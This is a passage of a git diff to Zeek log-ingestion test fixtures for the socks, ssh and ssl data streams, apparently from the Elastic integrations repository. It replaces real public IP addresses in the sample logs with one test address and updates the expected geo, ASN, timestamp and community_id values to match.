"{\"ts\":1566508093.09494,\"uid\":\"Cmz4Cb4qCw1hGqYw1c\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":35368,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":8080,\"version\":5,\"status\":\"succeeded\",\"request.name\":\"www.google.com\",\"request_p\":443,\"bound.host\":\"0.0.0.0\",\"bound_p\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -111,7 +111,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:38.923288900Z", + "ingested": "2021-12-09T13:51:12.003940700Z", "original": "{\"ts\":1566508093.09494,\"uid\":\"Cmz4Cb4qCw1hGqYw1c\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":35368,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":8080,\"version\":5,\"status\":\"succeeded\",\"request.name\":\"www.google.com\",\"request_p\":443,\"bound.host\":\"0.0.0.0\",\"bound_p\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log index a4545506e31..056aff668f2 100644 --- a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log +++ b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log @@ -1,5 +1,5 @@ {"ts":1562527532.904291,"uid":"CajWfz1b3qnnWT0BU9","id.orig_h":"192.168.1.2","id.orig_p":48380,"id.resp_h":"192.168.1.1","id.resp_p":22,"version":2,"auth_success":false,"auth_attempts":2,"client":"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10","server":"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1","cipher_alg":"chacha20-poly1305@openssh.com","mac_alg":"umac-64-etm@openssh.com","compression_alg":"none","kex_alg":"curve25519-sha256@libssh.org","host_key_alg":"ecdsa-sha2-nistp256","host_key":"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd"} -{"ts":1617123417.413634,"uid":"COXxsJ3dlSh6ECRYQj","id.orig_h":"51.161.10.160","id.orig_p":38204,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} -{"ts":1617123445.61524,"uid":"CZPdXz1jfKSWzIDAeb","id.orig_h":"113.53.238.195","id.orig_p":44164,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} -{"ts":1617123450.957272,"uid":"Cha1rs3OamonAZ4Nz6","id.orig_h":"34.86.35.26","id.orig_p":33953,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-ZGrab ZGrab SSH Survey"} +{"ts":1617123417.413634,"uid":"COXxsJ3dlSh6ECRYQj","id.orig_h":"89.160.20.156","id.orig_p":38204,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} +{"ts":1617123445.61524,"uid":"CZPdXz1jfKSWzIDAeb","id.orig_h":"89.160.20.156","id.orig_p":44164,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-libssh-0.6.3"} +{"ts":1617123450.957272,"uid":"Cha1rs3OamonAZ4Nz6","id.orig_h":"89.160.20.156","id.orig_p":33953,"id.resp_h":"10.156.0.2","id.resp_p":22,"auth_attempts":0,"direction":"INBOUND","client":"SSH-2.0-ZGrab ZGrab SSH Survey"} {"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1562527532.904291,\"uid\":\"CajWfz1b3qnnWT0BU9\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":48380,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":22,\"version\":2,\"auth_success\":false,\"auth_attempts\":2,\"client\":\"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10\",\"server\":\"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1\",\"cipher_alg\":\"chacha20-poly1305@openssh.com\",\"mac_alg\":\"umac-64-etm@openssh.com\",\"compression_alg\":\"none\",\"kex_alg\":\"curve25519-sha256@libssh.org\",\"host_key_alg\":\"ecdsa-sha2-nistp256\",\"host_key\":\"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/ssh.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json index f92a8eff4d2..571b3271453 100644 --- a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json +++ b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json @@ -42,7 +42,7 @@ "ip": "192.168.1.2" }, "event": { - "ingested": "2021-08-11T19:18:39.341768100Z", + "ingested": "2021-12-09T13:51:12.452231300Z", "original": "{\"ts\":1562527532.904291,\"uid\":\"CajWfz1b3qnnWT0BU9\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":48380,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":22,\"version\":2,\"auth_success\":false,\"auth_attempts\":2,\"client\":\"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10\",\"server\":\"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1\",\"cipher_alg\":\"chacha20-poly1305@openssh.com\",\"mac_alg\":\"umac-64-etm@openssh.com\",\"compression_alg\":\"none\",\"kex_alg\":\"curve25519-sha256@libssh.org\",\"host_key_alg\":\"ecdsa-sha2-nistp256\",\"host_key\":\"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -72,7 +72,7 @@ }, "related": { "ip": [ - "51.161.10.160", + "89.160.20.156", "10.156.0.2" ] }, @@ -93,27 +93,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "Canada", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -79.3716, - "lat": 43.6319 - }, - "country_iso_code": "CA" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 16276, + "number": 29518, "organization": { - "name": "OVH SAS" + "name": "Bredband2 AB" } }, - "address": "51.161.10.160", + "address": "89.160.20.156", "port": 38204, - "ip": "51.161.10.160" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-08-11T19:18:39.341793700Z", - "original": "{\"ts\":1617123417.413634,\"uid\":\"COXxsJ3dlSh6ECRYQj\",\"id.orig_h\":\"51.161.10.160\",\"id.orig_p\":38204,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}", + "ingested": "2021-12-09T13:51:12.452241800Z", + "original": "{\"ts\":1617123417.413634,\"uid\":\"COXxsJ3dlSh6ECRYQj\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38204,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "COXxsJ3dlSh6ECRYQj", @@ -130,7 +133,7 @@ ], "network": { "protocol": "ssh", - "community_id": "1:fEvwFYOBXBS6afWiC3Wd7zi4ym8=", + "community_id": "1:QGlqHtMfOLw8OB6pGB9IpiEjOns=", "transport": "tcp" } }, @@ -141,7 +144,7 @@ }, "related": { "ip": [ - "113.53.238.195", + "89.160.20.156", "10.156.0.2" ] }, @@ -162,27 +165,30 @@ }, "source": { "geo": { - "continent_name": "Asia", - "country_name": "Thailand", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 100.4667, - "lat": 13.75 - }, - "country_iso_code": "TH" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 131293, + "number": 29518, "organization": { - "name": "TOT Public Company Limited" + "name": "Bredband2 AB" } }, - "address": "113.53.238.195", + "address": "89.160.20.156", "port": 44164, - "ip": "113.53.238.195" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-08-11T19:18:39.341802800Z", - "original": "{\"ts\":1617123445.61524,\"uid\":\"CZPdXz1jfKSWzIDAeb\",\"id.orig_h\":\"113.53.238.195\",\"id.orig_p\":44164,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}", + "ingested": "2021-12-09T13:51:12.452248100Z", + "original": "{\"ts\":1617123445.61524,\"uid\":\"CZPdXz1jfKSWzIDAeb\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":44164,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CZPdXz1jfKSWzIDAeb", @@ -199,7 +205,7 @@ ], "network": { "protocol": "ssh", - "community_id": "1:GsVj5goD0raV3RtUCa7RbCE4LM0=", + "community_id": "1:O601cjibDdZfkinhYZ/6g88dhVg=", "transport": "tcp" } }, @@ -210,7 +216,7 @@ }, "related": { "ip": [ - "34.86.35.26", + "89.160.20.156", "10.156.0.2" ] }, @@ -231,27 +237,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "34.86.35.26", + "address": "89.160.20.156", "port": 33953, - "ip": "34.86.35.26" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-08-11T19:18:39.341811Z", - "original": "{\"ts\":1617123450.957272,\"uid\":\"Cha1rs3OamonAZ4Nz6\",\"id.orig_h\":\"34.86.35.26\",\"id.orig_p\":33953,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-ZGrab ZGrab SSH Survey\"}", + "ingested": "2021-12-09T13:51:12.452253900Z", + "original": "{\"ts\":1617123450.957272,\"uid\":\"Cha1rs3OamonAZ4Nz6\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":33953,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-ZGrab ZGrab SSH Survey\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "Cha1rs3OamonAZ4Nz6", @@ -268,7 +277,7 @@ ], "network": { "protocol": "ssh", - "community_id": "1:hQmKiiCVA2EG4uaydkM5n4w8EZ4=", + "community_id": "1:r0AFDEZ24hQ9fR/G+AgLwQmwmc0=", "transport": "tcp" } }, @@ -330,7 +339,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:39.341818100Z", + "ingested": "2021-12-09T13:51:12.452259700Z", "original": "{\"ts\":1562527532.904291,\"uid\":\"CajWfz1b3qnnWT0BU9\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":48380,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":22,\"version\":2,\"auth_success\":false,\"auth_attempts\":2,\"client\":\"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10\",\"server\":\"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1\",\"cipher_alg\":\"chacha20-poly1305@openssh.com\",\"mac_alg\":\"umac-64-etm@openssh.com\",\"compression_alg\":\"none\",\"kex_alg\":\"curve25519-sha256@libssh.org\",\"host_key_alg\":\"ecdsa-sha2-nistp256\",\"host_key\":\"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log index bd8bb284045..e717fff3a89 100644 --- a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log +++ b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log @@ -1,10 +1,10 @@ -{"ts":1547688736.805088,"uid":"CAOvs1BMFCX2Eh0Y3","id.orig_h":"10.178.98.102","id.orig_p":63199,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FebkbHWVCV8rEEEne","F4BDY41MGUBT6URZMd","FWlfEfiHVkv8evDL3"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} -{"ts":1547688736.80509,"uid":"C3mki91FnnNtm0u1ok","id.orig_h":"10.178.98.102","id.orig_p":63198,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["Fue9H32OmuitQk2zR","FpbiBP215tk2xftxM6","FEdROj1vUzTGw3BIUa"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} -{"ts":1547688736.805527,"uid":"CfGBt82PzCXzHa0iek","id.orig_h":"10.178.98.102","id.orig_p":63197,"id.resp_h":"35.199.178.4","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FiFLYv3UjeWyv2gcW","FvSsiB1Xi816EMagI9","FWpPS4mjGaAhTRXLf"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"}{"ts":1602179457.352156,"uid":"CK17Dl2SB8bZOVonSl","id.orig_h":"10.0.0.1","id.orig_p":49228,"id.resp_h":"192.168.50.1","id.resp_p":443,"version":"TLSv12","cipher":"TLS_RSA_WITH_AES_128_CBC_SHA256","resumed":false,"established":true,"cert_chain_fuids":["FOLwYQ6rs70bIMSf9"],"client_cert_chain_fuids":[],"subject":"CN=foo,OU=foo@bar,O=org,L=locality,C=LO","issuer":"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI","validation_status":"self signed certificate","ja3":"74927e242d6c3febf8cb9cab10a7f889","ja3s":"80b3a14bccc8598a1f3bbe83e71f735f","resp_certificate_sha1":"5dad8b55621b6b9c30679d9d61248dd132a83c94","not_valid_before":1562022421,"not_valid_after":1577748224} -{"ts":1617091251.151303,"uid":"CLQiVH1VcpvT3ruEak","id.orig_h":"10.156.0.2","id.orig_p":52730,"id.resp_h":"46.101.87.151","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","resumed":false,"established":false} -{"ts":1617090955.826099,"uid":"CBiXOC4IqYxMv1xzf9","id.orig_h":"35.195.125.46","id.orig_p":52678,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false} -{"ts":1617091253.726384,"uid":"C4jH9IqWGZwc1PPUh","id.orig_h":"35.198.74.222","id.orig_p":53368,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"tickets.swiftcrypto.com","resumed":false,"established":false} -{"ts":1617091253.91861,"uid":"CXVMSq6Dainy4WFN9","id.orig_h":"35.198.74.222","id.orig_p":53382,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"rundeck.swiftcrypto.com","resumed":false,"established":false} -{"ts":1617091254.325291,"uid":"CsgtQe4AikDZBsIM6k","id.orig_h":"10.156.0.2","id.orig_p":55120,"id.resp_h":"104.154.89.105","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","resumed":false,"established":false,"cert_chain_fuids":["FeyRIk4nUtwwcUcnRf"],"client_cert_chain_fuids":[],"validation_status":"self signed certificate"} -{"ts":1617091255.065602,"uid":"CPGhJS3UPpcnR96NQc","id.orig_h":"35.195.125.46","id.orig_p":53095,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"35.199.178.4\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/ssl.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":1547688736.805088,"uid":"CAOvs1BMFCX2Eh0Y3","id.orig_h":"10.178.98.102","id.orig_p":63199,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FebkbHWVCV8rEEEne","F4BDY41MGUBT6URZMd","FWlfEfiHVkv8evDL3"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} +{"ts":1547688736.80509,"uid":"C3mki91FnnNtm0u1ok","id.orig_h":"10.178.98.102","id.orig_p":63198,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["Fue9H32OmuitQk2zR","FpbiBP215tk2xftxM6","FEdROj1vUzTGw3BIUa"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} +{"ts":1547688736.805527,"uid":"CfGBt82PzCXzHa0iek","id.orig_h":"10.178.98.102","id.orig_p":63197,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FiFLYv3UjeWyv2gcW","FvSsiB1Xi816EMagI9","FWpPS4mjGaAhTRXLf"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"}{"ts":1602179457.352156,"uid":"CK17Dl2SB8bZOVonSl","id.orig_h":"10.0.0.1","id.orig_p":49228,"id.resp_h":"192.168.50.1","id.resp_p":443,"version":"TLSv12","cipher":"TLS_RSA_WITH_AES_128_CBC_SHA256","resumed":false,"established":true,"cert_chain_fuids":["FOLwYQ6rs70bIMSf9"],"client_cert_chain_fuids":[],"subject":"CN=foo,OU=foo@bar,O=org,L=locality,C=LO","issuer":"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI","validation_status":"self signed certificate","ja3":"74927e242d6c3febf8cb9cab10a7f889","ja3s":"80b3a14bccc8598a1f3bbe83e71f735f","resp_certificate_sha1":"5dad8b55621b6b9c30679d9d61248dd132a83c94","not_valid_before":1562022421,"not_valid_after":1577748224} +{"ts":1617091251.151303,"uid":"CLQiVH1VcpvT3ruEak","id.orig_h":"10.156.0.2","id.orig_p":52730,"id.resp_h":"89.160.20.156","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","resumed":false,"established":false} +{"ts":1617090955.826099,"uid":"CBiXOC4IqYxMv1xzf9","id.orig_h":"89.160.20.156","id.orig_p":52678,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false} +{"ts":1617091253.726384,"uid":"C4jH9IqWGZwc1PPUh","id.orig_h":"89.160.20.156","id.orig_p":53368,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"tickets.swiftcrypto.com","resumed":false,"established":false} +{"ts":1617091253.91861,"uid":"CXVMSq6Dainy4WFN9","id.orig_h":"89.160.20.156","id.orig_p":53382,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"rundeck.swiftcrypto.com","resumed":false,"established":false} +{"ts":1617091254.325291,"uid":"CsgtQe4AikDZBsIM6k","id.orig_h":"10.156.0.2","id.orig_p":55120,"id.resp_h":"89.160.20.156","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","resumed":false,"established":false,"cert_chain_fuids":["FeyRIk4nUtwwcUcnRf"],"client_cert_chain_fuids":[],"validation_status":"self signed certificate"} +{"ts":1617091255.065602,"uid":"CPGhJS3UPpcnR96NQc","id.orig_h":"89.160.20.156","id.orig_p":53095,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/ssl.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json index b723863999d..5fb44d81860 100644 --- a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json +++ b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json @@ -2,30 +2,30 @@ "expected": [ { "server": { - "address": "35.199.178.4" + "address": "89.160.20.156" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.199.178.4", + "address": "89.160.20.156", "port": 9243, - "ip": "35.199.178.4" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CAOvs1BMFCX2Eh0Y3", @@ -69,7 +69,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:1PMhYqOKBIyRAQeMbg/pWiJ198g=", + "community_id": "1:GxaGWG2yZvSkPH3IztyD2Rn77Ag=", "transport": "tcp" }, "@timestamp": "2019-01-17T01:32:16.805Z", @@ -79,7 +79,7 @@ "related": { "ip": [ "10.178.98.102", - "35.199.178.4" + "89.160.20.156" ] }, "client": { @@ -112,8 +112,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-08-11T19:18:40.056072700Z", - "original": 